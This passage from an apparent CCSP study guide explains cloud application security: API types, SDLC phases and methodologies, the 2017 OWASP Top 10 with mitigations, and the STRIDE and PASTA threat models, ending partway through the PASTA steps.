Chapter 6

Domain 4: Cloud Application Security

IN THIS CHAPTER

Bullet Building awareness for cloud application security

Bullet Exploring the fundamentals of the Software Development Lifecycle (SDLC)

Bullet Examining common SDLC methodologies

Bullet Learning how to apply security throughout the SDLC

Bullet Securely using and integrating third-party software components

Bullet Exploring cloud application architecture

Bullet Learning how to control identity and access management for your applications

In this chapter, you explore the most important application security concerns that exist in cloud environments. I provide an overview of the Secure Software Development Lifecycle process and then move into specific technologies for managing your cloud applications securely and effectively. Domain 4 represents 17 percent of the CCSP certification exam.

Cloud application development is a rapidly growing field thanks to the number of organizations that continue to migrate their applications and data to cloud-based infrastructures. As these migrations happen, it’s up to the well-informed cloud security professional to guide organizations through requirements definition, policy generation, and application development. Although the process of securing cloud-based applications shares many similarities with on-premise solutions, as a CCSP candidate, you must be mindful of techniques and methodologies that are specific to cloud application security.

Advocating Training and Awareness for Application Security

While you may be surprised to see a section on training and awareness in the Cloud Application Security chapter, think for a minute about how critical application development and deployment is in cloud environments and keep in mind the potential impacts associated with insecure code being deployed across a vast cloud infrastructure. As a CCSP candidate, it’s important that you’re familiar with the basics of cloud application development and that you have a strong understanding of common pitfalls and vulnerabilities that exist throughout the Software Development Lifecycle.

Cloud development basics

The key difference between application development in the cloud and in traditional IT models is that cloud development relies heavily on the usage of APIs. While it may sound like type of beer, an API, or Application Programming Interface, is a software-to-software communication link that allows two applications (like a client and a server) to interact with one another over the Internet. APIs include the set of programming instructions and standards necessary for a client application to interact with some web-based server application to perform actions or retrieve needed information.

Because cloud environments are strictly web-accessible, CSPs make APIs available to cloud developers to allow them to access, manage, and control cloud resources. There are several types of API formats, but the most commonly used are Simple Object Access Protocol (SOAP) and Representational State Transfer (REST).

SOAP and REST both work across HTTP, and both rely on established rules that their users have agreed to follow — but that’s just about where the similarities end; they are quite different in approach and implementation.

SOAP is a protocol that was designed to ensure that programs built in different languages or platforms could communicate with each other in a structured manner. SOAP encapsulates data in a SOAP envelope and then uses HTTP or other protocols to transmit the encapsulated data. A major limitation of SOAP is that it only allows usage of XML-formatted data. While SOAP was long the standard solution for web service interfaces, today it is typically used to support legacy applications, or where REST is not technically feasible to use.

REST is a standard that addresses SOAP’s shortcomings as a complicated, slow, and rigid protocol. REST is not a protocol, but rather a software architecture style applied to web applications. REST is a flexible architectural scheme that can use SOAP as the underlying protocol, if desired, and supports data formats such as JSON, XML, or YAML. Part of the convenience behind REST is that RESTful services use standard URLs and HTTP methods (like GET, POST, and DELETE) to manage resources.

Technical stuff Five architectural constraints are required for a system to be considered RESTful: client-server architecture, statelessness, cacheable, layered system, and uniform interface. These constraints restrict the ways in which clients and servers communicate and ensure the appropriate scalability, performance, and interoperability.

Understanding the basics of APIs is important for every cloud professional and is especially important when preparing for the CCSP exam. Make sure that you understand which types of APIs your cloud provider offers and thoroughly consider any limitations and impact to your organization’s cloud application security.

Common pitfalls

Being able to prepare for, identify, and understand cloud-based application issues is a tremendous skill that every cloud security professional should develop. As a CCSP, it’s your responsibility to help your organization maintain awareness of potential and actual risks when migrating to or developing applications in the cloud. Failure to do so may result in application vulnerabilities that ultimately lead to unsuccessful projects, unnecessary expenses, reputational damage for your company, or worse. The issues I discuss in this section are some of the most common cloud application development pitfalls.

Migration and portability issues

Traditional on-premise systems and applications are designed, implemented, and optimized to run in traditional data centers. These applications have likely not been developed with cloud environments or services in mind, and so when migrating to the cloud, application functionality and security may not be exactly the same as what you’re used to in your on-prem environments. As a cloud security professional, you must assess your on-prem applications with the expectation that they have not been developed to run in the cloud. This expectation helps ensure that proper precautions are taken when designing (or redesigning) application security controls during the migration.

In many instances, on-premise applications are developed in such a way that they depend on very specific security controls as implemented in your organization’s data centers. When these applications are migrated to the cloud, some of these controls may need to be reconfigured or redeveloped to accommodate your new cloud-based solution. Remember that many CSPs offer modern security technologies that are routinely updated to remain cutting-edge. It’s very likely that an application that’s been hosted in a 20-year-old data center infrastructure is not properly configured for a simple lift and shift to the cloud.

Remember Lift and shift is the process of taking applications and workloads from one environment and seamlessly placing them in another, usually cloud-based, environment. It’s important that you be mindful of the fact that not all applications can be lifted and shifted to the cloud due to the many technical interdependencies that exist in on-prem solutions. It’s almost always necessary to modify existing configurations or change the way an application interacts with other applications and systems.

Integration issues

In a traditional IT environment, your organization maintains full control over the entire infrastructure — you have complete access to servers, networking devices, and all other hardware and software in your data center. When moving to a cloud environment, your developers and administrators no longer have this level of control, and in some cases, the difference can be drastic. Performing system and application integrations without full access to all supporting systems and services can be very complicated. Cloud customers are left to rely on the CSP for assistance, which may not only extend integration timelines but also increase project costs. Using the cloud provider’s APIs, where possible, can help minimize integration risk and reduce the overall complexity of development. APIs are a CSP’s way of providing just enough control to the customer to facilitate integration and management of their cloud-based applications.

Cloud environment challenges

When developing cloud-based applications, it is essential that developers and system administrators understand the nuances of cloud environments and the potential pitfalls that these nuances may present during application development. The following list identifies some key factors that organizations should consider before cloud-based application development:

  • The deployment model (public, private, community, or hybrid) being leveraged determines the level of multitenancy and may impact application development considerations related to privacy.
  • The service model (IaaS, PaaS, or SaaS) being leveraged is most often PaaS for pure application development projects, but may also include IaaS deployments. The service model determines how much access to systems, logs, and information your development team has.

The preceding items ultimately come down to considerations around multitenancy, shared responsibility, and customer control/access. It’s important that you consider these factors to avoid common pitfalls, such as lack of required isolation (for example, as required by certain compliance frameworks) and lack of sufficient control over supporting resources. Fully understanding what deployment model and service model your application is being developed for is a critical step toward planning for and addressing potential development challenges in your cloud environment.

Warning Make sure that your development environment matches the production environment that you intend to use! Organizations sometimes use a development environment that has a different deployment model than their production environment — it’s not uncommon to see development being done in a private cloud (or even on-premise) environment before moving to a public cloud infrastructure. Some organizations even use a separate CSPs for development and production, often for cost purposes. It’s important to keep in mind that not all CSPs offer the same APIs or functionality, which may cause portability issues if using dissimilar environments for dev and prod.

Insufficient documentation

As a field, application development has evolved over the years into some generally accepted best practices, principles, and methodologies. Mature organizations maintain well-documented policies and procedures that guide their development teams through the SDLC. Following these policies and procedures helps developers efficiently create their applications while minimizing security risks.

As developers move to different environments, like the cloud, some of their tried-and-true methodologies don’t work the way they always have. As such, organizations often find themselves with a lack of thorough documentation focused on secure development in cloud environments. Although many CSPs provide guidance to their customers, documentation often lags their speed of innovation — service updates and new releases may make existing documentation obsolete or incomplete. Ultimately, it’s up to each organization (led by their fearless CCSP) to understand how cloud architectures influence their SDLC and to accurately document policies, procedures, and best practices that take into account the additional concerns and considerations associated with cloud development.

Common cloud vulnerabilities

As discussed throughout this book, cloud environments demonstrate certain essential characteristics (on-demand self-service, resource pooling, broad network access, and so on) that help provide the goodness of cloud computing when properly understood and utilized. Having a firm understanding of these characteristics and the vulnerabilities inherent in cloud computing is critical for developers building cloud-based applications.

The following categories of common cloud vulnerabilities are each associated with one or more of the key cloud computing characteristics I discuss in Chapter 3.

  • Access control vulnerabilities
  • Internet-related vulnerabilities
  • Data storage vulnerabilities
  • Usage vulnerabilities

The following section discusses each of the these in detail.

Access control vulnerabilities

The cloud characteristic on-demand self-service means that cloud users can access cloud services whenever they need them. This sort of ongoing access makes identity and access management a critical concern for developers. It is essential that applications are developed and implemented with the principle of least privilege in mind, providing each user access to only the resources that she requires to do her job.

In addition to managing users’ roles and access within applications, developers should be mindful of using weak authentication and authorization methods that allow users to bypass built-in security measures, such as least privilege. Developers should enforce strong authentication by requiring periodic re-authentication and multifactor authentication where possible. For even more assurance, developers and cloud architects should consider implementing a Zero Trust architecture, as discussed in Chapter 5.

Another (even scarier) vulnerability is that of unauthorized access to the management plane. Some level of access to a management interface is usually required for cloud users to access their cloud resources. Without proper configuration, this access presents a higher risk in cloud environments than in traditional IT infrastructures with very few management interfaces. Cloud developers and administrators must ensure that management APIs are tightly secured and closely monitored.

Internet-related vulnerabilities

The cloud characteristic broad network access means that cloud resources are accessible by users via a network, using standard network protocols (TCP, IP, and so on). In most cases, the network being used is the Internet, which must always be considered an untrusted network. As such, common Internet-related vulnerabilities like Denial of Service and man-in-the-middle attacks are major considerations in cloud computing. A well-designed system (and applications) include controls that detect and prevent misconfigurations that can lead to these types of vulnerabilities being exploited.

Data storage vulnerabilities

The cloud characteristic resource pooling and the related term multitenancy mean that the data of one cloud customer is likely to share resources with another, unrelated cloud customer. Although CSPs generally have strong logical separation between tenants and their data, the very nature of sharing physical machines presents some level risk to cloud customers. In many cases, legal or regulatory requirements can be satisfied only by demonstrating appropriate separation between tenants’ data. Developers can help enforce logical separation between tenants by encrypting data at rest (and in transit) using strong encryption algorithms. Where encryption is not possible, developers should explore data masking and other obfuscation techniques.

The cloud characteristic of rapid elasticity means that systems scale up and down as necessary to support changing customer demand. In order to provide this functionality, CSPs build large, geographically dispersed infrastructures that support users where they are. With this dispersion comes another legal and compliance vulnerability related to data location. While some cloud providers allow you to restrict your data to certain geographic locations, most CSPs do not currently provide this ability for all their services. When certain regulations require that data remains in specific regions, developers must ensure that their applications store and process regulated data only in compliant cloud services.

Misuse vulnerabilities

The cloud characteristic measured service means that you pay for what you use — nothing more and nothing less. Where this approach can go wrong is when system and application vulnerabilities allow unauthorized parties to misuse cloud resources and run up the bill. An example is crypto jacking, which is a form of malware that steals computing resources and uses them to mine for Bitcoin or other cryptocurrencies. Proper monitoring should be built into all systems and applications to detect cloud misuse as soon as possible.

Describing the Secure Software Development Lifecycle (SDLC) Process

Streamlined and secure application development requires a consistent methodology and a well-defined process of getting from concept to finished product. SDLC is the series of steps that is followed to build, modify, and maintain computing software.

Business requirements

Your organization’s business requirements should be a key consideration whenever you develop new software or even when you modify existing applications. You should make sure that you have a firm understanding of your organization’s goals (overall and specific to your project) and knowledge of the end-user’s needs and expectations.

It’s important to gather input from as many stakeholders as possible as early as possible to support the success of your application. Gathering requirements from relevant leaders and business units across your organization is crucial to ensuring that you don’t waste development cycles on applications or features that don’t meet the needs of your business.

These business requirements are a critical input into the SDLC.

Phases

While the SDLC process has multiple different variations, it most commonly includes the steps, or phases, in Figure 6-1:

  • Planning
  • Defining
  • Designing
  • Developing
  • Testing
  • Deploying and maintaining
An overview of the different phases of the Software Development Lifecycle - Planning, Defining, Designing, Developing, Testing, Deploying and maintaining.

FIGURE 6-1: Software Development Lifecycle overview.

Tip There’s a good chance that you will see at least one question related to the SDLC on your exam. Remember that the titles of each phase may vary slightly from one methodology to the next, but make sure that you have a strong understanding of the overall flow and the order of operations.

Remember Although none of the stages specifically reference security, it is important that you consider security at each and every step of the SDLC process. Waiting until later stages of the process can introduce unnecessary security risks, which can add unforeseen costs and extend your project timeline.

Planning

The Planning phase is the most fundamental stage of the SDLC and is sometimes called Requirements Gathering. During this initial phase, the project scope is established and high-level requirements are gathered to support the remaining lifecycle phases. The project team should work with senior leadership and all project stakeholders to create the overall project timeline and identify project costs and resources required.

During the Planning phase, you must consider all requirements and desired features and conduct a cost-benefit analysis to determine the potential financial impact versus the proposed value to the end-user. Using all the information that you gather during this phase, you should then validate the economical and technical feasibility of proceeding with the project.

The Planning phase is where risks should initially be identified. Your project team should consider what may go wrong and how you can mitigate, or lower, the impact of those risks. For example, imagine that you’re building an online banking application. As part of the Planning phase, you should not only consider all functional requirements of such an application, but also security and compliance requirements, such as satisfying PCI DSS. Consider what risks currently exist within your organization (or your cloud environment) that might get in the way of demonstrating PCI DSS and then plan ways to address those risks.

Defining

You may also see this phase referred to as Requirements Analysis. During the Defining phase, you use all the business requirements, feasibility studies, and stakeholder input from the Planning phase to document clearly defined product requirements. Your product requirements should provide full details of the specific features and functionality of your proposed application. These requirements will ultimately feed your design decisions, so it needs to be as thorough as possible.

In addition, during this phase you must define the specific hardware and software requirements required for your development team — identify what type of dev environment is needed, designate your programming language, and define all technical resources needed to complete the project.

Tip This phase is where you should specifically define all your application security requirements and identify the tools and resources necessary to develop those accordingly. You should be thinking about where encryption is required, what type of access control features are needed, and what requirements you have for maintaining your code’s integrity.

Designing

The Designing phase is where you take your product requirements and software specifications and turn them into an actual design plan, often called a design specification document. This design plan is then used during the next phase to guide the actual development and implementation of your application.

During the Designing phase, your developers, systems architects, and other technical staff create the high-level system and software design to meet each identified requirement. Your mission during this phase is to design the overall software architecture and create a plan that identifies the technical details of your application’s design. In cloud development, this phase includes defining the required amount of CPU cores, RAM, and bandwidth, while also identifying which cloud services are required for full functionality of your application. This component is critical because it may identify a need for your organization to provision additional cloud resources. Your design should define all software components that need to be created, interconnections with third-party systems, the front-end user interface, and all data flows (both within the application and between users and the application).

At this stage of the SDLC, you should also conduct threat modeling exercises and integrate your risk mitigation decisions (from the Planning phase) into your formal designs. In other words, you want to fully identify potential risks, I cover threat modeling in the aptly titled “Threat modeling” section in this chapter.

Developing

Software developers, rejoice! After weeks or even months of project planning, you can finally write some code! During this phase of the SDLC, your development team breaks up the work documented in previous steps into pieces (or modules) that are coded individually. Database developers create the required data storage architecture, front-end developers create the interface that users will interact with, and back-end developers code all the behind-the-scenes inner-workings of the application. This phase is typically the longest of the SDLC, but if the previous steps are followed carefully, it can be the least complicated part of the whole process.

During this phase, developers should conduct peer reviews of each other’s code to check for flaws, and each individual module should be unit tested to verify its functionality prior to being rolled into the larger project. Some development teams skip this part and struggle mightily to debug flaws once an application is completed.

In addition to conducting functional testing of each module, the time is right to begin security testing. Your organization should conduct static code analysis and security scanning of each module before integration into the project. Failure to do so may allow individual software vulnerabilities to get lost in the overall codebase, and multiple individual security flaws may combine to present a larger aggregate risk, or combined risk.

Testing

Once the code is fully developed, the application enters the Testing phase. During this phase, application testers seek to verify whether the application functions as desired and according to the documented requirements; the ultimate goal here is to uncover all flaws within the application and report those flaws to the developers for patching. This cyclical process continues until all product requirements have been validated and all flaws have been fixed.

As a completed application, security testers have more tools at their disposal to uncover security flaws. Instead of relying solely on static code analysis, testers can use dynamic analysis to identify flaws that occur only when the code is executed. Static analysis and dynamic analysis are further discussed in the “Security testing methodologies” section of this chapter.

Tip The Testing phase is one of the most crucial phases of the SDLC, as it is the main gate between your development team and customers. Testing should be conducted in accordance with an application testing plan that identifies what and how to test. Management and relevant stakeholders should carefully review and approve your testing plan before testing begins.

Deploying and maintaining

Once the application has passed the Testing phase, it is ready to be deployed for customer use. There are often multiple stages of deployment (Alpha, Beta, and General Availability are common ones), each with its own breadth of deployment (for example, alpha releases tend to be deployed to select customers, whereas general availability means it’s ready for everyone).

Once applications have been tested and successfully deployed, they enter a maintenance phase where they’re continually monitored and updated. During the Maintaining phase, the production software undergoes an ongoing cycle of the SDLC process, where security patches and other updates go through the same planning, defining, designing, developing, testing, and deploying activities discussed in the preceding sections.

Many SDLC models include a separate phase for disposal or termination, which happens when an application is no longer needed or supported. From a security perspective, you should keep in mind that data (including portions of applications) may remain in cloud environments even after deletion. Consult your contracts and SLAs for commitments that your CSP makes for data deletion and check out Chapter 4 for more on secure data deletion.

Methodologies

Although the steps within the SDLC remain largely constant, several SDLC methodologies, or models, exist, and each approaches these steps in slightly different ways. Two of the most commonly referenced and used methodologies are waterfall and agile.

Waterfall

Waterfall is the oldest and most straightforward SDLC methodology. In this model, you complete one phase and then continue on to the next — you move in sequential order, flowing through every step of the cycle from beginning to end. Each phase of this model relies on successful completion of the previous phase; there’s no going back, because… well, because waterfalls don’t flow up.

Some advantages of the waterfall methodology include

  • It’s simple to manage and easy to follow.
  • Tracking and measuring progress is easy because you have a clearly defined end state early on.
  • The measure twice, cut once approach allows applications to be developed based upon a more complete understanding of all requirements and deliverables from the start.
  • The process can largely occur without customer intervention after requirements are initially gathered. Customers and developers agree on desired outcomes early in the project.

Some challenges that come with waterfall include

  • It’s rigid. Requirements must be fully developed early in the process and are difficult to change once the design has been completed.
  • Products may take longer to deliver compared to more iterative models, like agile (see the next section).
  • It relies very little on the customer or end-user, which may make some customers feel left out.
  • Testing is delayed until late in the process, which may allow small issues to build up into larger ones before they’re detected.

Agile

Agile is more of the new kid on the block, having been introduced in the 1990s. In this model, instead of proceeding in a linear and sequential fashion, development and testing activities occur simultaneously and cyclically.

Application development is separated into sprints that produce a succession of releases that each improves upon the previous release. With the agile model, the goal is to move quickly and to fail fast — create your first release, test it, fix it, and create your next release fast!

Some advantages of the agile methodology include

  • It’s flexible. You can move from one phase to the next without worrying that the previous phase isn’t perfect or complete.
  • Time to market is much quicker than waterfall.
  • It’s very user-focused; the customer has frequent opportunities to give feedback on the application.
  • Risks may be reduced because the iterative nature of agile allows you get feedback and conduct testing early and often.

Some challenges that come with Agile include

  • It can be challenging to apply in real-life projects, especially larger projects with many stakeholders and components.
  • The product end-state is less predictable than waterfall. With agile, you iterate until you’re happy with the result.
  • It requires a very high level of collaboration and frequent communication between developers, customers, and other stakeholders. This challenge can be a pro, but sometimes has a negative impact on developers and project timelines.

Applying the SDLC Process

Applying the SDLC to your cloud application development requires an understanding of common application vulnerabilities, cloud-specific risks, and the use of threat modeling to assess the impact of those risks. This section guides you through securely applying the SDLC process to your cloud development initiatives.

Common vulnerabilities during development

The Open Web Application Security Project (OWASP) is an online community with a wealth of helpful projects and resources. I cover some of its helpful logging-related resources in Chapter 4, but one of the most famous projects is OWASP Top 10, which identifies the most critical security risks to web applications. This list is particularly relevant to cloud applications, which are inherently web-based.

As of this writing, OWASP Top 10 was last updated in 2017. The top ten web application security risks outlined by OWASP are

  • Injection
  • Broken authentication
  • Sensitive data exposure
  • XML external entities (XXE)
  • Broken access control
  • Security misconfiguration
  • Cross-site scripting (XSS)
  • Insecure deserialization
  • Using components with known vulnerabilities
  • Insufficient logging and monitoring

The following sections describe these risks in detail.

Injection

Injection attacks refer to a broad class of attacks in which a malicious actor sends untrusted commands or input to an application. Vulnerable applications process the untrusted input as part of a valid command or query, which then alters the course of the application’s execution. In doing so, injection attacks can give an attacker control over an application’s program flow, grant an attacker unauthorized access to data, or even allow full system compromise. It’s no wonder that this type of vulnerability ranks at the top of the OWASP Top 10.

Common injection attacks include SQL injection, code injection, and cross-site scripting, discussed later in this chapter. These attacks are not only dangerous, but also very widespread. Many freely available tools make exploiting these common vulnerabilities simple, even for inexperienced hackers.

Applications can be protected against injection attacks by restricted privileges for high-risk actions and by performing input validation. Input validation is the process of ensuring that all input fields are properly checked and approved by the application prior to processing the input. Input validation requires locking down your application code to allow only expected input types and values and filtering any suspicious or untrusted inputs.

Broken authentication

Broken authentication is a vulnerability that allows an attacker to capture or bypass an application’s authentication mechanisms, allowing the attacker to assume the identity of the attacked user, thus granting the attacker the same privileges as that user.

Broken authentication can occur in several ways. It can be as obvious as an application allowing weak passwords that are easily guessed or as obscure as an application not terminating an authenticated session when a browser is closed. In the latter example, imagine that you’re using a public computer to check your bank account (generally not advised, but bear with me). Instead of clicking the “Sign out” button, you simply close your browser. If the banking site is not programmed to timeout upon browser closure, then the next user of that machine could potentially open the same browser and still be authenticated to your account.

Developers can do a few things to protect applications from broken authentication. Some recommendations include

  • Enforce multifactor authentication, wherever possible, and enforce password length and complexity everywhere else.
  • Implement a session timeout for sessions that have been inactive longer than a predetermined amount of time.
  • Monitor for and deter brute force login attempts by disabling accounts after an organization-determined number of failed logins (five is a common number, but you should check your compliance obligations as well).
  • Use SSL to encrypt data in transit, wherever possible.
  • Properly encrypt and/or hide session IDs and session tokens. Do not place session IDs in URLs because users often share links.
  • Consider using a web application firewall (WAF). WAFs filter all traffic into your web application and can also support multifactor authentication. Many CSPs now offer built-in WAF services, though some come at an additional cost.

Sensitive data exposure

Sensitive data exposure is exactly what it sounds like. Many web applications collect, store, and use sensitive user information — data like user credentials, PII, and credit card data. Some of these web applications do not properly secure this sensitive information, which can lead to exposure to unauthorized parties.

Many of the data protection principles you learn about throughout this book apply here. Web applications should enforce encryption at rest and in transit, especially where sensitive data exists. Applications should also check for and enforce secure communications methods when exchanging sensitive data with browsers.

XML External Entities (XXE)

An XML External Entity (XXE) attack occurs when XML input containing a reference to an external entity is processed by an application without thorough parsing. The deep technical details of XXE are outside the scope of this book, but you should understand that XXE attacks may lead to data theft, port scanning, Denial of Service, and more.

Tip The best way to prevent XEE attacks is to disable document type definitions, which is an XML-specific characteristic. For more information on XXE and its preventions, visit https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A4-XML_External_Entities_(XXE).

Broken access control

I introduce access control in Chapter 3, and you learn about it in detail throughout this book. In short, access control is the set of policies and mechanisms that ensures users aren’t able to act outside of their intended permissions. Broken access control is, of course, failure of access control mechanisms to properly limit or control access to resources. Broken access control includes things like unauthorized privilege escalation, bypassing access controls by modifying the URL or other settings, and manipulating metadata to gain unauthorized access.

Prevention of broken access control begins during the Testing phase, but continues well into the Maintaining phase. Static and dynamic analysis techniques can help identify weak access control mechanisms, but security teams should also conduct penetration tests on systems that process sensitive information. In addition, enforcing a deny by default policy, validating application inputs, and performing periodic checks of a user’s privilege can all help mitigate risks associated with broken access control. Finally, do not forget that detection is just as important as prevention; you must log and continually monitor access to your application to enable quick detection and remediation of broken access control.

Security misconfiguration

Security misconfiguration is pretty straightforward; it’s when systems or applications are not properly or securely configured. Examples of security misconfiguration include

  • Use of default credentials (for example, admin:admin)
  • Use of insecure default configurations (for example, leaving firewalls in a default allow configuration)
  • Unpatched or outdated systems
  • Error messages that share too much information (for example, your application should never say “wrong username” or “incorrect password,” because this phrasing gives attackers a clue as to which might be right or wrong — login failures should be reported as “incorrect username/password” or similar)

Preventing security misconfiguration starts with unit testing that you conduct in the Designing phase and continues through testing and into the Maintaining phase. It’s essential that you have strong configuration management practices in place to monitor and manage configurations across all your systems and applications.

Cross-site scripting (XSS)

Cross-site scripting, or XSS, is a specific variant of injection attacks that targets web applications. XSS enables an attacker to inject untrusted code (like a malicious script) into a web page or application. When an unsuspecting user navigates to the infected web page, the untrusted code is then executed in the user’s browser using their permissions. XSS acts as a vehicle for an attacker to deliver malicious code to anyone who navigates to the infected application. The infected code can manipulate the output of the original website, redirect the user to a malicious site, give the attacker control over the user’s web session, or even leverage the browser’s permissions to access information on the user’s local machine. As you can imagine, the potential damage caused by XSS vulnerability is huge, and it remains one of the top security concerns for cloud developers.

As with the rest of the family of injection attacks, cross-site scripting is primarily protected by input validation and sanitization. As a cloud security professional, make sure that your applications check all input for malicious code.

Insecure deserialization

Technical stuff Jargon alert! Jargon alert! In computer science, serialization is the process of breaking down an object (like a file) into a stream of bytes (0s and 1s) for storage or transmission. Deserialization is, of course, the inverse operation of reconstructing a series of bytes into its original format.

Insecure deserialization occurs when an application or API takes an untrusted stream of bytes and reconstructs it into a potentially malicious file. One of the ways that malware masks itself is by breaking itself down to avoid signature detection and then relying on some later process to reconstruct it. Insecure deserialization can be used to perform a wide array attacks and can also lead to remote code execution.

Developers should ensure that applications and APIs accept only serialized data from trusted sources, if at all.

Using components with known vulnerabilities

This vulnerability occurs when your application is built on one or more vulnerable framework, module, library, or other software component. While each component may have limited privileges on its own, the potential risk increases once it is integrated into your application. Using components with known vulnerabilities may indirectly impact other parts of your application and may even compromise sensitive data.

The best protection from this vulnerability is vigilant updating and patching of all components within your application. Your application is only as secure as its weakest link; failing to patch one component’s security flaws makes your entire application vulnerable to attack.

Insufficient logging and monitoring

Insufficient logging exists when systems and applications fail to capture, maintain, and protect all auditable events. Events that should be logged include privileged access, login failures, and other events I discuss in Chapters 4 and 5. The auditable events must be captured in logs and stored in a system separate from the system being audited to ensure that the logs are not compromised if the system itself is compromised. Also, be sure to maintain log data in accordance with any regulatory and contractual requirements.

Insufficient monitoring occurs when logged events are not sufficiently monitored or integrated into incident response activities. This vulnerability may allow attackers to maintain persistence, pivot to other systems, and cause additional harm that may be prevented with early detection. The best prevention against insufficient monitoring is to develop and maintain a comprehensive strategy for monitoring logs and taking action on important security events.

Cloud-specific risks

You probably realize that a great deal of overlap occurs between application security in the cloud and application security in traditional data center environments. Despite the similarities, it’s important that you take note of the nature of cloud computing and how cloud architectures contribute to a unique risk landscape. The Cloud Security Alliance (CSA) routinely publishes a fantastic guide that outlines the top risks in cloud environments. I cover CSA’s 2019 “Egregious Eleven” in Chapter 3.

I won’t go into the specifics of each risk again, but you should definitely check out Chapter 3 if you haven’t already. What’s important to remember is that your risks change depending upon your cloud service category. For PaaS, risks like insufficient identity, credential, access, and key management and limited cloud usage visibility are bigger concerns because you, as a cloud customer, have a lower level of access and control than you do in IaaS environments. For application developers in IaaS environments, your risk is skewed more toward misconfiguration and inadequate change control and insider threat because your users and applications generally have a higher level of access, which poses a higher level of risk if misused. When considering cloud-specific risks, make sure that you take into account how your service category affects your application’s risk posture.

Quality Assurance (QA)

Quality assurance, or QA, is the process of ensuring software quality through validation and verification activities. The role of QA in software development is to ensure that applications conform to requirements and to quickly identify any risks. QA is not testing, but rather an umbrella field that includes testing, guidance, and oversight activities throughout the entire SDLC.

QA professionals are an integral part of any application development project and should work with developers, cloud architects, and project managers to ensure a quality product is designed, developed, and delivered to the customer.

Threat modeling

Threat modeling is a technique by which you can identify potential threats to your application and identify suitable countermeasures for defense. Threats may be related to overall system vulnerabilities or an absence of necessary security controls. You can use threat modeling to help securely develop software or to help reduce risk in an already deployed application.

There are numerous approaches to threat modeling, but two of the most commonly used are called STRIDE and PASTA.

Tip In addition to STRIDE and PASTA, you may come across the DREAD threat modeling approach. DREAD is a mnemonic for five categories that require risk rating under this threat model: Damage, Reproducibility, Exploitability, Affected users, and Discoverability. Although the DREAD approach is not commonly used in practice, you should know what it is, in case it shows up on your exam.

STRIDE

STRIDE is a model developed by a team at Microsoft in 1999 to help identify and classify computer security threats. The name itself is a mnemonic for six categories of security threats. STRIDE stands for

  • Spoofing
  • Tampering
  • Repudiation
  • Information disclosure
  • Denial of service
  • Elevation of privilege

Tip STRIDE is an important acronym that helps you remember six categories of known threats to evaluate at every system or application endpoint. Remember what the STRIDE acronym stands for, as it may show up on your exam.

  • Spoofing: Spoofing is an attack during which a malicious actor assumes the identity of another user (or system) by falsifying information. A common example of identity spoofing occurs when email spammers modify the From: field to show the name of a sender that the target recipient is more likely to trust. Within applications, spoofing can occur if an attacker steals and uses a victim’s authentication information (like username and password) to impersonate and act as them within the application.
  • Tampering: Data tampering is an attack on the integrity of data by intentionally and maliciously manipulating data. Tampering can include altering data on disk, in memory, over the network, or elsewhere. Within cloud and other web-based applications, tampering attacks generally target the exchange between your application and the client. Tampering with a cloud application can lead to modification of user credentials or other application data by a malicious user or a third party conducting a man-in-the-middle attack. Applications that don’t properly validate user input may allow malicious users to modify values for personal gain (decreasing the price of an item in their shopping cart, for example) and have the manipulated data stored and used by the application.
  • Repudiation: I introduce the concept of nonrepudiation in Chapter 4. The opposite concept, repudiation, is the ability of a party to deny that they are responsible for performing some action. Repudiation threat occurs when a user claims that they did not perform an action, and no other party is able to prove otherwise. In the real world, signing for a package delivery is a common form of nonrepudiation — the delivery company maintains physical record that you received and accepted the package on a specific date. In applications, an example of repudiation threat is a user claiming that they did not make an online purchase. Your organization may have just given away a free item if your application does not have controls to prove that the user did indeed complete the purchase. It is essential that your applications maintain comprehensive logs of all user actions that face this threat. Controls like digital signatures and multifactor authentication can be integrated into certain applications to provide additional nonrepudiation for high-risk actions.
  • Information disclosure: Information disclosure is what happens during a data breach — information is shared with someone who should not have access to it. This threat compromises the confidentiality of data and carries a great deal of risk depending on the sensitivity of the leaked data. You should focus a great deal of attention on protecting against this threat in applications that store PII, PHI, financial information, or other information with high privacy requirements. Data encryption, strong access control, and other data protection mechanisms are the keys to protection here.
  • Denial of service: I talk about DoS throughout much of this book. A DoS attack denies access by legitimate users. Any application is a potential DoS target — and, even with the high availability provided by cloud infrastructures, cloud developers must still remain aware of this threat. Controls should be put in place to monitor and detect abnormally high resource consumption by any single user, which may be an indication of either malicious or unintentional resource exhaustion. As a principle, applications should be developed with availability and reliability in mind.
  • Elevation of privilege: Elevation of privilege (or privilege escalation) comes last in the STRIDE acronym, but is one of the highest risk items on this list. Elevation occurs when an unprivileged (or regular) application user is able to upgrade their privileges to those of a privileged user (like an administrator). Elevation of privilege can give an untrusted party the keys to the kingdom and grant them access to and control over sensitive data and systems. Strong access control is critical to protecting against this threat. Applications must require reverification of a user’s identity and credentials prior to granting privileged access, and multifactor authentication should be used, wherever possible.

PASTA

Most people would be surprised to hear that spaghetti and linguini can help secure their cloud environments. I would be surprised, too — that’s just silly! The Process for Attack Simulation and Threat Analysis (PASTA) is a risk-based threat model, developed in 2012, that supports dynamic threat analysis. The PASTA methodology integrates business objectives with technical requirements, application risks, and attack modeling. This attacker-centric perspective of the application produces a mitigation strategy that includes threat enumeration, impact analysis, and scoring.

The PASTA methodology has seven stages:

  1. Define objectives.

    During this step, you define key business objectives and critical security and compliance requirements. In addition, you perform a preliminary business impact analysis (BIA) that identifies potential business impact considerations.

  2. Define technical scope.

    You can’t protect something until you know it exists and needs protecting. During this step, you document the boundaries of the technical environment and identify the scope of all technical assets that need threat analysis. In addition to the application boundaries, you must identify all infrastructure, application, and software dependencies. The goal is to capture a high-level, but comprehensive, view of all servers, hosts, devices, applications, protocols, and data that need to be protected.

  3. Perform application decomposition.

    This step requires you to focus on understanding the data flows between your assets (in other words, the application components) and identify all application entry points and trust boundaries. You should leave this step with a clear understanding of all data sources, the parties that access those data sources, and all use cases for data access within your application — basically, who should perform what actions on which components of your application.

  4. Complete a threat analysis.

    In this step, you review threat data from within your environment (SIEM feeds, WAF logs, and so on) as well as externally available threat intelligence that is related to your application (for example, if you run a banking app, numerous resources are available to learn about emergent cyber threats to financial services companies). You should be seeking to understand threat-attack scenarios that are relevant to your specific application, environment, and data. At the end of this stage, you should have a list of the most likely attack vectors for your given application.

  5. Conduct a vulnerability analysis.

    During this step, you focus on identifying all vulnerabilities within your code and correlating them to the threat-attack scenarios identified in Step 4. You should be reviewing your OS, database, network, and application scans, as well as all dynamic and static code analysis results, to enumerate and score existing vulnerabilities. The primary output of this stage is a correlated mapping of all threat-attack vectors to existing vulnerabilities and impacted assets.

  6. Model attacks.

